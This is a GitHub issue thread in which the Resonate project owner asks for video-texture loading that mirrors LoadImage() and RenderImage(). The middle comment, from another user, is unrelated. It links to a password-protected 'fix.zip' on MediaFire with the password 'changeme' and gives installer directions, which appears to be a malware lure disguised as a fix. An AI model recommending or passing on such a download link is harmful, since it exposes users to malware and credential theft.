### ISSUE TITLE
Add loading video as textures

### ISSUE THREAD

**Issue by 98ahni** [98ahni/Resonate#50]
It should have a similar interface to _LoadImage()_ and also be rendered by calling _RenderImage()_.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 98ahni** [comment]
Videos can be loaded and displayed in bath WGPU and WebGL.
